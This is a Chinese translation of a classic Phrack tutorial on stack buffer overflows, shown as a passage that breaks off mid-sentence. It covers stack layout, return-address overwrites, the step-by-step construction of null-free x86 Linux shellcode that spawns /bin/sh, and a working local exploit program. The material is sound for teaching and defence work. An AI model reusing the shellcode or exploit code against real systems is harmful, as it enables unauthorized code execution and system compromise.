macky0668

缓冲区溢出的原理和实践

经典转载 - 缓冲区溢出的原理和实践(Phrack)

简介

在过去的几个月中,被发现和利用的缓冲区溢出漏洞呈现上升趋势.例如syslog,
splitvt, sendmail 8.7.5, Linux/FreeBSD mount, Xt library, at等等.本文试图
解释什么是缓冲区溢出, 以及如何利用.

汇编的基础知识是必需的. 对虚拟内存的概念, 以及使用gdb的经验是十分有益
的, 但不是必需的. 我们还假定使用Intel x86 CPU, 操作系统是Linux.

在开始之前我们给出几个基本的定义: 缓冲区,简单说来是一块连续的计算机内
存区域, 可以保存相同数据类型的多个实例. C程序员通常和字缓冲区数组打交道.
最常见的是字符数组. 数组, 与C语言中所有的变量一样, 可以被声明为静态或动态
的. 静态变量在程序加载时定位于数据段. 动态变量在程序运行时定位于堆栈之中.
溢出, 说白了就是灌满, 使内容物超过顶端, 边缘, 或边界. 我们这里只关心动态
缓冲区的溢出问题, 即基于堆栈的缓冲区溢出.

                           进程的内存组织形式

为了理解什么是堆栈缓冲区, 我们必须首先理解一个进程是以什么组织形式在
内存中存在的. 进程被分成三个区域: 文本, 数据和堆栈. 我们把精力集中在堆栈
区域, 但首先按照顺序简单介绍一下其他区域.

文本区域是由程序确定的, 包括代码(指令)和只读数据. 该区域相当于可执行
文件的文本段. 这个区域通常被标记为只读, 任何对其写入的操作都会导致段错误
(segmentation violation).

数据区域包含了已初始化和未初始化的数据. 静态变量储存在这个区域中. 数
据区域对应可执行文件中的data-bss段. 它的大小可以用系统调用brk(2)来改变.
如果bss数据的扩展或用户堆栈把可用内存消耗光了, 进程就会被阻塞住, 等待有了
一块更大的内存空间之后再运行. 新内存加入到数据和堆栈段的中间.
                           /------------------"  内存低地址
                           |                |
                           |    文本    |
                           |                |
                           |------------------|
                           |  (已初始化) |
                           |       数据 |
                           |  (未初始化) |
                           |------------------|
                           |                |
                           |    堆栈    |
                           |                |
                           "------------------/  内存高地址

                           Fig. 1 进程内存区域

                                    什么是堆栈?
                              ~~~~~~~~~~~~~

堆栈是一个在计算机科学中经常使用的抽象数据类型. 堆栈中的物体具有一个特性:
最后一个放入堆栈中的物体总是被最先拿出来, 这个特性通常称为后进先处(LIFO)队列.

堆栈中定义了一些操作. 两个最重要的是PUSH和POP. PUSH操作在堆栈的顶部加入一
个元素. POP操作相反, 在堆栈顶部移去一个元素, 并将堆栈的大小减一.

                              为什么使用堆栈?
                           ~~~~~~~~~~~~~~~~
现代计算机被设计成能够理解人们头脑中的高级语言. 在使用高级语言构造程序时
最重要的技术是过程(procedure)和函数(function). 从这一点来看, 一个过程调用可
以象跳转(jump)命令那样改变程序的控制流程, 但是与跳转不同的是, 当工作完成时,
函数把控制权返回给调用之后的语句或指令. 这种高级抽象实现起来要靠堆栈的帮助.

堆栈也用于给函数中使用的局部变量动态分配空间, 同样给函数传递参数和函数返
回值也要用到堆栈.

                                 堆栈区域
                              ~~~~~~~~~~
堆栈是一块保存数据的连续内存. 一个名为堆栈指针(SP)的寄存器指向堆栈的顶部.
堆栈的底部在一个固定的地址. 堆栈的大小在运行时由内核动态地调整. CPU实现指令
PUSH和POP, 向堆栈中添加元素和从中移去元素.

堆栈由逻辑堆栈帧组成. 当调用函数时逻辑堆栈帧被压入栈中, 当函数返回时逻辑
堆栈帧被从栈中弹出. 堆栈帧包括函数的参数, 函数地局部变量, 以及恢复前一个堆栈
帧所需要的数据, 其中包括在函数调用时指令指针(IP)的值.

堆栈既可以向下增长(向内存低地址)也可以向上增长, 这依赖于具体的实现. 在我
们的例子中, 堆栈是向下增长的. 这是很多计算机的实现方式, 包括Intel, Motorola,
SPARC和MIPS处理器. 堆栈指针(SP)也是依赖于具体实现的. 它可以指向堆栈的最后地址,
或者指向堆栈之后的下一个空闲可用地址. 在我们的讨论当中, SP指向堆栈的最后地址.

除了堆栈指针(SP指向堆栈顶部的的低地址)之外, 为了使用方便还有指向帧内固定
地址的指针叫做帧指针(FP). 有些文章把它叫做局部基指针(LB-local base pointer).
从理论上来说, 局部变量可以用SP加偏移量来引用. 然而, 当有字被压栈和出栈后, 这
些偏移量就变了. 尽管在某些情况下编译器能够跟踪栈中的字操作, 由此可以修正偏移
量, 但是在某些情况下不能. 而且在所有情况下, 要引入可观的管理开销. 而且在有些
机器上, 比如Intel处理器, 由SP加偏移量访问一个变量需要多条指令才能实现.

因此, 许多编译器使用第二个寄存器, FP, 对于局部变量和函数参数都可以引用,
因为它们到FP的距离不会受到PUSH和POP操作的影响. 在Intel CPU中, BP(EBP)用于这
个目的. 在Motorola CPU中, 除了A7(堆栈指针SP)之外的任何地址寄存器都可以做FP.
考虑到我们堆栈的增长方向, 从FP的位置开始计算, 函数参数的偏移量是正值, 而局部
变量的偏移量是负值.

当一个例程被调用时所必须做的第一件事是保存前一个FP(这样当例程退出时就可以
恢复). 然后它把SP复制到FP, 创建新的FP, 把SP向前移动为局部变量保留空间. 这称为
例程的序幕(prolog)工作. 当例程退出时, 堆栈必须被清除干净, 这称为例程的收尾
(epilog)工作. Intel的ENTER和LEAVE指令, Motorola的LINK和UNLINK指令, 都可以用于
有效地序幕和收尾工作.

下面我们用一个简单的例子来展示堆栈的模样:

example1.c:
------------------------------------------------------------------------------
void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];
}

void main() {
  function(1,2,3);
}
------------------------------------------------------------------------------


为了理解程序在调用function()时都做了哪些事情, 我们使用gcc的-S选项编译, 以产
生汇编代码输出:

$ gcc -S -o example1.s example1.c

通过查看汇编语言输出, 我们看到对function()的调用被翻译成:

      pushl $3
      pushl $2
      pushl $1
      call function

以从后往前的顺序将function的三个参数压入栈中, 然后调用function(). 指令call
会把指令指针(IP)也压入栈中. 我们把这被保存的IP称为返回地址(RET). 在函数中所做
的第一件事情是例程的序幕工作:

      pushl %ebp
      movl %esp,%ebp
      subl $20,%esp

将帧指针EBP压入栈中. 然后把当前的SP复制到EBP, 使其成为新的帧指针. 我们把这
个被保存的FP叫做SFP. 接下来将SP的值减小, 为局部变量保留空间.

我们必须牢记:内存只能以字为单位寻址. 在这里一个字是4个字节, 32位. 因此5字节
的缓冲区会占用8个字节(2个字)的内存空间, 而10个字节的缓冲区会占用12个字节(3个字)
的内存空间. 这就是为什么SP要减掉20的原因. 这样我们就可以想象function()被调用时
堆栈的模样(每个空格代表一个字节):

内存低地址                                                       内存高地址

         buffer2    buffer1 sfp ret a    b    c
<------ [          ][       ][ ][ ][ ][ ][ ]

堆栈顶部                                                          堆栈底部



                                 缓冲区溢出
                              ~~~~~~~~~~~~
缓冲区溢出是向一个缓冲区填充超过它处理能力的数据所造成的结果. 如何利用这个
经常出现的编程错误来执行任意代码呢? 让我们来看看另一个例子:

example2.c
------------------------------------------------------------------------------
void function(char *str) {
char buffer[16];

strcpy(buffer,str);
}

void main() {
  char large_string[256];
  int i;

  for( i = 0; i < 255; i++)
large_string[i] = 'A';

  function(large_string);
}
------------------------------------------------------------------------------

这个程序的函数含有一个典型的内存缓冲区编码错误. 该函数没有进行边界检查就复
制提供的字符串, 错误地使用了strcpy()而没有使用strncpy(). 如果你运行这个程序就
会产生段错误. 让我们看看在调用函数时堆栈的模样:

内存低地址                                                       内存高地址

               buffer          sfp ret *str
<------       [             ][ ][ ][ ]

堆栈顶部                                                          堆栈底部

这里发生了什么事? 为什么我们得到一个段错误? 答案很简单: strcpy()将*str的
内容(larger_string[])复制到buffer[]里, 直到在字符串中碰到一个空字符. 显然,
buffer[]比*str小很多. buffer[]只有16个字节长, 而我们却试图向里面填入256个字节
的内容. 这意味着在buffer之后, 堆栈中250个字节全被覆盖. 包括SFP, RET, 甚至*str!
我们已经把large_string全都填成了A. A的十六进制值为0x41. 这意味着现在的返回地
址是0x41414141. 这已经在进程的地址空间之外了. 当函数返回时, 程序试图读取返回
地址的下一个指令, 此时我们就得到一个段错误.

因此缓冲区溢出允许我们更改函数的返回地址. 这样我们就可以改变程序的执行流程.
现在回到第一个例子, 回忆当时堆栈的模样:

内存低地址                                                       内存高地址

         buffer2    buffer1 sfp ret a    b    c
<------ [          ][       ][ ][ ][ ][ ][ ]

堆栈顶部                                                          堆栈底部

现在试着修改我们第一个例子, 让它可以覆盖返回地址, 而且使它可以执行任意代码.
堆栈中在buffer1[]之前的是SFP, SFP之前是返回地址. ret从buffer1[]的结尾算起是4个
字节.应该记住的是buffer1[]实际上是2个字即8个字节长. 因此返回地址从buffer1[]的开
头算起是12个字节. 我们会使用这种方法修改返回地址, 跳过函数调用后面的赋值语句
'x=1;', 为了做到这一点我们把返回地址加上8个字节. 代码看起来是这样的:

example3.c:
------------------------------------------------------------------------------
void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];
int *ret;

ret = buffer1 + 12;
(*ret) += 8;
}

void main() {
  int x;

  x = 0;
  function(1,2,3);
  x = 1;
  printf("%d/n",x);
}
------------------------------------------------------------------------------

我们把buffer1[]的地址加上12, 所得的新地址是返回地址储存的地方. 我们想跳过
赋值语句而直接执行printf调用. 如何知道应该给返回地址加8个字节呢? 我们先前使用
过一个试验值(比如1), 编译该程序, 祭出工具gdb:

------------------------------------------------------------------------------
[aleph1]$ gdb example3
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) disassemble main
Dump of assembler code for function main:
0x8000490 <main>:    pushl  %ebp
0x8000491 <main+1>:    movl %esp,%ebp
0x8000493 <main+3>:    subl $0x4,%esp
0x8000496 <main+6>:    movl $0x0,0xfffffffc(%ebp)
0x800049d <main+13>: pushl  $0x3
0x800049f <main+15>: pushl  $0x2
0x80004a1 <main+17>: pushl  $0x1
0x80004a3 <main+19>: call 0x8000470 <function>
0x80004a8 <main+24>: addl $0xc,%esp
0x80004ab <main+27>: movl $0x1,0xfffffffc(%ebp)
0x80004b2 <main+34>: movl 0xfffffffc(%ebp),%eax
0x80004b5 <main+37>: pushl  %eax
0x80004b6 <main+38>: pushl  $0x80004f8
0x80004bb <main+43>: call 0x8000378 <printf>
0x80004c0 <main+48>: addl $0x8,%esp
0x80004c3 <main+51>: movl %ebp,%esp
0x80004c5 <main+53>: popl %ebp
0x80004c6 <main+54>: ret
0x80004c7 <main+55>: nop
------------------------------------------------------------------------------

我们看到当调用function()时, RET会是0x8004a8, 我们希望跳过在0x80004ab的赋值
指令. 下一个想要执行的指令在0x8004b2. 简单的计算告诉我们两个指令的距离为8字节.

                              Shell Code
                              ~~~~~~~~~~
现在我们可以修改返回地址即可以改变程序执行的流程, 我们想要执行什么程序呢?
在大多数情况下我们只是希望程序派生出一个shell. 从这个shell中, 可以执行任何我
们所希望的命令. 但是如果我们试图破解的程序里并没有这样的代码可怎么办呢? 我们
怎么样才能将任意指令放到程序的地址空间中去呢? 答案就是把想要执行的代码放到我
们想使其溢出的缓冲区里, 并且覆盖函数的返回地址, 使其指向这个缓冲区. 假定堆栈
的起始地址为0xFF, S代表我们想要执行的代码, 堆栈看起来应该是这样:

内存低    DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF    内存高
地址    89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF    地址
         buffer             sfp ret a    b    c

<------ [SSSSSSSSSSSSSSSSSSSS][SSSS][0xD8][0x01][0x02][0x03]
         ^                         |
         |____________________________|
堆栈顶部                                                       堆栈底部

派生出一个shell的C语言代码是这样的:

shellcode.c
-----------------------------------------------------------------------------
#include <stdio.h>

void main() {
char *name[2];

name[0] = "/bin/sh";
name[1] = NULL;
execve(name[0], name, NULL);
}
------------------------------------------------------------------------------

为了查明这程序变成汇编后是个什么样子, 我们编译它, 然后祭出调试工具gdb. 记住
在编译的时候要使用-static标志, 否则系统调用execve的真实代码就不会包括在汇编中,
取而代之的是对动态C语言库的一个引用, 真正的代码要到程序加载的时候才会联入.

------------------------------------------------------------------------------
[aleph1]$ gcc -o shellcode -ggdb -static shellcode.c
[aleph1]$ gdb shellcode
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(gdb) disassemble main
Dump of assembler code for function main:
0x8000130 <main>:    pushl  %ebp
0x8000131 <main+1>:    movl %esp,%ebp
0x8000133 <main+3>:    subl $0x8,%esp
0x8000136 <main+6>:    movl $0x80027b8,0xfffffff8(%ebp)
0x800013d <main+13>: movl $0x0,0xfffffffc(%ebp)
0x8000144 <main+20>: pushl  $0x0
0x8000146 <main+22>: leal 0xfffffff8(%ebp),%eax
0x8000149 <main+25>: pushl  %eax
0x800014a <main+26>: movl 0xfffffff8(%ebp),%eax
0x800014d <main+29>: pushl  %eax
0x800014e <main+30>: call 0x80002bc <__execve>
0x8000153 <main+35>: addl $0xc,%esp
0x8000156 <main+38>: movl %ebp,%esp
0x8000158 <main+40>: popl %ebp
0x8000159 <main+41>: ret
End of assembler dump.
(gdb) disassemble __execve
Dump of assembler code for function __execve:
0x80002bc <__execve>: pushl  %ebp
0x80002bd <__execve+1>: movl %esp,%ebp
0x80002bf <__execve+3>: pushl  %ebx
0x80002c0 <__execve+4>: movl $0xb,%eax
0x80002c5 <__execve+9>: movl 0x8(%ebp),%ebx
0x80002c8 <__execve+12>:       movl 0xc(%ebp),%ecx
0x80002cb <__execve+15>:       movl 0x10(%ebp),%edx
0x80002ce <__execve+18>:       int $0x80
0x80002d0 <__execve+20>:       movl %eax,%edx
0x80002d2 <__execve+22>:       testl  %edx,%edx
0x80002d4 <__execve+24>:       jnl 0x80002e6 <__execve+42>
0x80002d6 <__execve+26>:       negl %edx
0x80002d8 <__execve+28>:       pushl  %edx
0x80002d9 <__execve+29>:       call 0x8001a34 <__normal_errno_location>
0x80002de <__execve+34>:       popl %edx
0x80002df <__execve+35>:       movl %edx,(%eax)
0x80002e1 <__execve+37>:       movl $0xffffffff,%eax
0x80002e6 <__execve+42>:       popl %ebx
0x80002e7 <__execve+43>:       movl %ebp,%esp
0x80002e9 <__execve+45>:       popl %ebp
0x80002ea <__execve+46>:       ret
0x80002eb <__execve+47>:       nop
End of assembler dump.
------------------------------------------------------------------------------

下面我们看看这里究竟发生了什么事情. 先从main开始研究:

------------------------------------------------------------------------------
0x8000130 <main>:    pushl  %ebp
0x8000131 <main+1>:    movl %esp,%ebp
0x8000133 <main+3>:    subl $0x8,%esp

      这是例程的准备工作. 首先保存老的帧指针, 用当前的堆栈指针作为新的帧指针,
      然后为局部变量保留空间. 这里是:

      char *name[2];

      即2个指向字符串的指针. 指针的长度是一个字, 所以这里保留2个字(8个字节)的
      空间.

0x8000136 <main+6>:    movl $0x80027b8,0xfffffff8(%ebp)

      我们把0x80027b8(字串"/bin/sh"的地址)这个值复制到name[]中的第一个指针, 这
      等价于:

      name[0] = "/bin/sh";

0x800013d <main+13>: movl $0x0,0xfffffffc(%ebp)


      我们把值0x0(NULL)复制到name[]中的第二个指针, 这等价于:

      name[1] = NULL;

      对execve()的真正调用从下面开始:

0x8000144 <main+20>: pushl  $0x0

      我们把execve()的参数以从后向前的顺序压入堆栈中, 这里从NULL开始.

0x8000146 <main+22>: leal 0xfffffff8(%ebp),%eax

      把name[]的地址放到EAX寄存器中.

0x8000149 <main+25>: pushl  %eax

      接着就把name[]的地址压入堆栈中.

0x800014a <main+26>: movl 0xfffffff8(%ebp),%eax

      把字串"/bin/sh"的地址放到EAX寄存器中

0x800014d <main+29>: pushl  %eax

      接着就把字串"/bin/sh"的地址压入堆栈中

0x800014e <main+30>: call 0x80002bc <__execve>

      调用库例程execve(). 这个调用指令把IP(指令指针)压入堆栈中.
------------------------------------------------------------------------------

现在到了execve(). 要注意我们使用的是基于Intel的Linux系统. 系统调用的细节随
操作系统和CPU的不同而不同. 有的把参数压入堆栈中, 有的保存在寄存器里. 有的使用
软中断跳入内核模式, 有的使用远调用(far call). Linux把传给系统调用的参数保存在
寄存器里, 并且使用软中断跳入内核模式.

------------------------------------------------------------------------------
0x80002bc <__execve>: pushl  %ebp
0x80002bd <__execve+1>: movl %esp,%ebp
0x80002bf <__execve+3>: pushl  %ebx

      例程的准备工作.

0x80002c0 <__execve+4>: movl $0xb,%eax

      把0xb(十进制的11)放入寄存器EAX中(原文误为堆栈). 0xb是系统调用表的索引
      11就是execve.

0x80002c5 <__execve+9>: movl 0x8(%ebp),%ebx

      把"/bin/sh"的地址放到寄存器EBX中.

0x80002c8 <__execve+12>:       movl 0xc(%ebp),%ecx

      把name[]的地址放到寄存器ECX中.

0x80002cb <__execve+15>:       movl 0x10(%ebp),%edx

      把空指针的地址放到寄存器EDX中.

0x80002ce <__execve+18>:       int $0x80

      进入内核模式.
------------------------------------------------------------------------------


由此可见调用execve()也没有什么太多的工作要做, 所有要做的事情总结如下:

      a) 把以NULL结尾的字串"/bin/sh"放到内存某处.
      b) 把字串"/bin/sh"的地址放到内存某处, 后面跟一个空的长字(null long word)
.
      c) 把0xb放到寄存器EAX中.
      d) 把字串"/bin/sh"的地址放到寄存器EBX中.
      e) 把字串"/bin/sh"地址的地址放到寄存器ECX中.
      (注: 原文d和e步骤把EBX和ECX弄反了)
      f) 把空长字的地址放到寄存器EDX中.
      g) 执行指令int $0x80.

但是如果execve()调用由于某种原因失败了怎么办? 程序会继续从堆栈中读取指令,
这时的堆栈中可能含有随机的数据! 程序执行这样的指令十有八九会core dump. 如果execv
e
调用失败我们还是希望程序能够干净地退出. 为此必须在调用execve之后加入一个exit
系统调用. exit系统调用在汇编语言看起来象什么呢?

exit.c
------------------------------------------------------------------------------
#include <stdlib.h>

void main() {
      exit(0);
}
------------------------------------------------------------------------------

------------------------------------------------------------------------------
[aleph1]$ gcc -o exit -static exit.c
[aleph1]$ gdb exit
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) disassemble _exit
Dump of assembler code for function _exit:
0x800034c <_exit>:    pushl  %ebp
0x800034d <_exit+1>: movl %esp,%ebp
0x800034f <_exit+3>: pushl  %ebx
0x8000350 <_exit+4>: movl $0x1,%eax
0x8000355 <_exit+9>: movl 0x8(%ebp),%ebx
0x8000358 <_exit+12>: int $0x80
0x800035a <_exit+14>: movl 0xfffffffc(%ebp),%ebx
0x800035d <_exit+17>: movl %ebp,%esp
0x800035f <_exit+19>: popl %ebp
0x8000360 <_exit+20>: ret
0x8000361 <_exit+21>: nop
0x8000362 <_exit+22>: nop
0x8000363 <_exit+23>: nop
End of assembler dump.
------------------------------------------------------------------------------

系统调用exit会把0x1放到寄存器EAX中, 在EBX中放置退出码, 并且执行"int 0x80".
就这些了! 大多数应用程序在退出时返回0, 以表示没有错误. 我们在EBX中也放入0. 现
在我们构造shell code的步骤就是这样的了:

      a) 把以NULL结尾的字串"/bin/sh"放到内存某处.
      b) 把字串"/bin/sh"的地址放到内存某处, 后面跟一个空的长字(null long word)
.
      c) 把0xb放到寄存器EAX中.
      d) 把字串"/bin/sh"的地址放到寄存器EBX中.
      e) 把字串"/bin/sh"地址的地址放到寄存器ECX中.
      (注: 原文d和e步骤把EBX和ECX弄反了)
      f) 把空长字的地址放到寄存器EDX中.
      g) 执行指令int $0x80.
      h) 把0x1放到寄存器EAX中.
      i) 把0x0放到寄存器EAX中.
      j) 执行指令int $0x80.

试着把这些步骤变成汇编语言, 把字串放到代码后面. 别忘了在数组后面放上字串

地址和空字, 我们有如下的代码:

------------------------------------------------------------------------------
      movl string_addr,string_addr_addr
      movb $0x0,null_byte_addr
      movl $0x0,null_addr
      movl $0xb,%eax
      movl string_addr,%ebx
      leal string_addr,%ecx
      leal null_string,%edx
      int $0x80
      movl $0x1, %eax
      movl $0x0, %ebx
      int $0x80
      /bin/sh string goes here.
------------------------------------------------------------------------------

问题是我们不知道在要破解的程序的内存空间中, 上述代码(和其后的字串)会被放到
哪里. 一种解决方法是使用JMP和CALL指令. JMP和CALL指令使用相对IP的寻址方式, 也就
是说我们可以跳到距离当前IP一定间距的某个位置, 而不必知道那个位置在内存中的确切
地址. 如果我们在字串"/bin/sh"之前放一个CALL指令, 并由一个JMP指令转到CALL指令上.
当CALL指令执行的时候, 字串的地址会被作为返回地址压入堆栈之中. 我们所需要的就是
把返回地址放到一个寄存器之中. CALL指令只是调用我们上述的代码就可以了. 假定J代
表JMP指令, C代表CALL指令, s代表字串, 执行过程如下所示:

内存低    DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF    内存高
地址    89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF    地址
         buffer             sfp ret a    b    c

<------ [JJSSSSSSSSSSSSSSCCss][ssss][0xD8][0x01][0x02][0x03]
         ^|^          ^|          |
         |||_____________||____________| (1)
   (2)  ||_____________||
         |______________| (3)

堆栈顶部                                                       堆栈底部

运用上述的修正方法, 并使用相对索引寻址, 我们代码中每条指令的字节数目如下:

------------------------------------------------------------------------------
      jmp offset-to-call          # 2 bytes
      popl %esi                   # 1 byte
      movl %esi,array-offset(%esi)  # 3 bytes
      movb $0x0,nullbyteoffset(%esi)# 4 bytes
      movl $0x0,null-offset(%esi) # 7 bytes
      movl $0xb,%eax             # 5 bytes
      movl %esi,%ebx             # 2 bytes
      leal array-offset(%esi),%ecx  # 3 bytes
      leal null-offset(%esi),%edx # 3 bytes
      int $0x80                   # 2 bytes
      movl $0x1, %eax             # 5 bytes
      movl $0x0, %ebx             # 5 bytes
      int $0x80                   # 2 bytes
      call offset-to-popl          # 5 bytes
      /bin/sh string goes here.
------------------------------------------------------------------------------

通过计算从jmp到call, 从call到popl, 从字串地址到数组, 从字串地址到空长字的
偏量, 我们得到:

------------------------------------------------------------------------------
      jmp 0x26                   # 2 bytes
      popl %esi                   # 1 byte
      movl %esi,0x8(%esi)          # 3 bytes
      movb $0x0,0x7(%esi)          # 4 bytes
      movl $0x0,0xc(%esi)          # 7 bytes
      movl $0xb,%eax             # 5 bytes
      movl %esi,%ebx             # 2 bytes
      leal 0x8(%esi),%ecx          # 3 bytes
      leal 0xc(%esi),%edx          # 3 bytes
      int $0x80                   # 2 bytes
      movl $0x1, %eax             # 5 bytes
      movl $0x0, %ebx             # 5 bytes
      int $0x80                   # 2 bytes
      call -0x2b                   # 5 bytes
      .string ""/bin/sh""          # 8 bytes
------------------------------------------------------------------------------

这看起来很不错了. 为了确保代码能够正常工作必须编译并执行. 但是还有一个问题.
我们的代码修改了自身, 可是多数操作系统将代码页标记为只读. 为了绕过这个限制我们
必须把要执行的代码放到堆栈或数据段中, 并且把控制转到那里. 为此应该把代码放到数
据段中的全局数组中. 我们首先需要用16进制表示的二进制代码. 先编译, 然后再用gdb
来取得二进制代码.

shellcodeasm.c
------------------------------------------------------------------------------
void main() {
__asm__("
      jmp 0x2a                   # 3 bytes
      popl %esi                   # 1 byte
      movl %esi,0x8(%esi)          # 3 bytes
      movb $0x0,0x7(%esi)          # 4 bytes
      movl $0x0,0xc(%esi)          # 7 bytes
      movl $0xb,%eax             # 5 bytes
      movl %esi,%ebx             # 2 bytes
      leal 0x8(%esi),%ecx          # 3 bytes
      leal 0xc(%esi),%edx          # 3 bytes
      int $0x80                   # 2 bytes
      movl $0x1, %eax             # 5 bytes
      movl $0x0, %ebx             # 5 bytes
      int $0x80                   # 2 bytes
      call -0x2f                   # 5 bytes
      .string ""/bin/sh""          # 8 bytes
");
}
------------------------------------------------------------------------------

------------------------------------------------------------------------------
[aleph1]$ gcc -o shellcodeasm -g -ggdb shellcodeasm.c
[aleph1]$ gdb shellcodeasm
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(gdb) disassemble main
Dump of assembler code for function main:
0x8000130 <main>:    pushl  %ebp
0x8000131 <main+1>:    movl %esp,%ebp
0x8000133 <main+3>:    jmp 0x800015f <main+47>
0x8000135 <main+5>:    popl %esi
0x8000136 <main+6>:    movl %esi,0x8(%esi)
0x8000139 <main+9>:    movb $0x0,0x7(%esi)
0x800013d <main+13>: movl $0x0,0xc(%esi)
0x8000144 <main+20>: movl $0xb,%eax
0x8000149 <main+25>: movl %esi,%ebx
0x800014b <main+27>: leal 0x8(%esi),%ecx
0x800014e <main+30>: leal 0xc(%esi),%edx
0x8000151 <main+33>: int $0x80
0x8000153 <main+35>: movl $0x1,%eax
0x8000158 <main+40>: movl $0x0,%ebx
0x800015d <main+45>: int $0x80
0x800015f <main+47>: call 0x8000135 <main+5>
0x8000164 <main+52>: das
0x8000165 <main+53>: boundl 0x6e(%ecx),%ebp
0x8000168 <main+56>: das
0x8000169 <main+57>: jae 0x80001d3 <__new_exitfn+55>
0x800016b <main+59>: addb %cl,0x55c35dec(%ecx)
End of assembler dump.
(gdb) x/bx main+3
0x8000133 <main+3>:    0xeb
(gdb)
0x8000134 <main+4>:    0x2a
(gdb)
.
.
.
------------------------------------------------------------------------------

testsc.c
------------------------------------------------------------------------------
char shellcode[] =
      ""xeb"x2a"x5e"x89"x76"x08"xc6"x46"x07"x00"xc7"x46"x0c"x00"x00"x00"
      ""x00"xb8"x0b"x00"x00"x00"x89"xf3"x8d"x4e"x08"x8d"x56"x0c"xcd"x80"
      ""xb8"x01"x00"x00"x00"xbb"x00"x00"x00"x00"xcd"x80"xe8"xd1"xff"xff"
      ""xff"x2f"x62"x69"x6e"x2f"x73"x68"x00"x89"xec"x5d"xc3";

void main() {
int *ret;

ret = (int *)&ret + 2;
(*ret) = (int)shellcode;

}
------------------------------------------------------------------------------
------------------------------------------------------------------------------
[aleph1]$ gcc -o testsc testsc.c
[aleph1]$ ./testsc
$ exit
[aleph1]$
------------------------------------------------------------------------------

成了! 但是这里还有一个障碍, 在多数情况下, 我们都是试图使一个字符缓冲区溢出.
那么在我们shellcode中的任何NULL字节都会被认为是字符串的结尾, 复制工作就到此为
止了. 对于我们的破解工作来说, 在shellcode里不能有NULL字节. 下面来消除这些字节,
同时把代码精简一点.

         Problem instruction:                Substitute with:
         --------------------------------------------------------
         movb $0x0,0x7(%esi)             xorl %eax,%eax
         molv $0x0,0xc(%esi)             movb %eax,0x7(%esi)
                                             movl %eax,0xc(%esi)
         --------------------------------------------------------
         movl $0xb,%eax                   movb $0xb,%al
         --------------------------------------------------------
         movl $0x1, %eax                   xorl %ebx,%ebx
         movl $0x0, %ebx                   movl %ebx,%eax
                                             inc %eax
         --------------------------------------------------------

Our improved code:

shellcodeasm2.c
------------------------------------------------------------------------------
void main() {
__asm__("
      jmp 0x1f                   # 2 bytes
      popl %esi                   # 1 byte
      movl %esi,0x8(%esi)          # 3 bytes
      xorl %eax,%eax             # 2 bytes
      movb %eax,0x7(%esi)          # 3 bytes
      movl %eax,0xc(%esi)          # 3 bytes
      movb $0xb,%al                # 2 bytes
      movl %esi,%ebx             # 2 bytes
      leal 0x8(%esi),%ecx          # 3 bytes
      leal 0xc(%esi),%edx          # 3 bytes
      int $0x80                   # 2 bytes
      xorl %ebx,%ebx             # 2 bytes
      movl %ebx,%eax             # 2 bytes
      inc %eax                   # 1 bytes
      int $0x80                   # 2 bytes
      call -0x24                   # 5 bytes
      .string ""/bin/sh""          # 8 bytes
                                    # 46 bytes total
");
}
------------------------------------------------------------------------------

And our new test program:

testsc2.c
------------------------------------------------------------------------------
char shellcode[] =
      ""xeb"x1f"x5e"x89"x76"x08"x31"xc0"x88"x46"x07"x89"x46"x0c"xb0"x0b"
      ""x89"xf3"x8d"x4e"x08"x8d"x56"x0c"xcd"x80"x31"xdb"x89"xd8"x40"xcd"
      ""x80"xe8"xdc"xff"xff"xff/bin/sh";

void main() {
int *ret;

ret = (int *)&ret + 2;
(*ret) = (int)shellcode;

}
------------------------------------------------------------------------------
------------------------------------------------------------------------------
[aleph1]$ gcc -o testsc2 testsc2.c
[aleph1]$ ./testsc2
$ exit
[aleph1]$
------------------------------------------------------------------------------

                                 破解实战
                              ~~~~~~~~~~

现在把手头的工具都准备好. 我们已经有了shellcode. 我们知道shellcode必须是被
溢出的字符串的一部分. 我们知道必须把返回地址指回缓冲区. 下面的例子说明了这几点:

overflow1.c
------------------------------------------------------------------------------
char shellcode[] =
      ""xeb"x1f"x5e"x89"x76"x08"x31"xc0"x88"x46"x07"x89"x46"x0c"xb0"x0b"
      ""x89"xf3"x8d"x4e"x08"x8d"x56"x0c"xcd"x80"x31"xdb"x89"xd8"x40"xcd"
      ""x80"xe8"xdc"xff"xff"xff/bin/sh";

char large_string[128];

void main() {
  char buffer[96];
  int i;
  long *long_ptr = (long *) large_string;

  for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;

  for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];

  strcpy(buffer,large_string);
}
------------------------------------------------------------------------------

------------------------------------------------------------------------------
[aleph1]$ gcc -o exploit1 exploit1.c
[aleph1]$ ./exploit1
$ exit
exit
[aleph1]$
------------------------------------------------------------------------------

如上所示, 我们用buffer[]的地址来填充large_string[]数组, shellcode就将会在
buffer[]之中. 然后我们把shellcode复制到large_string字串的开头. strcpy()不做任
何边界检查就会将large_string复制到buffer中去, 并且覆盖返回地址. 现在的返回地址
就是我们shellcode的起始位置. 一旦执行到main函数的尾部, 在试图返回时就会跳到我
们的shellcode中, 得到一个shell.

我们所面临的问题是: 当试图使另外一个程序的缓冲区溢出的时候, 如何确定这个
缓冲区(会有我们的shellcode)的地址在哪? 答案是: 对于每一个程序, 堆栈的起始地址
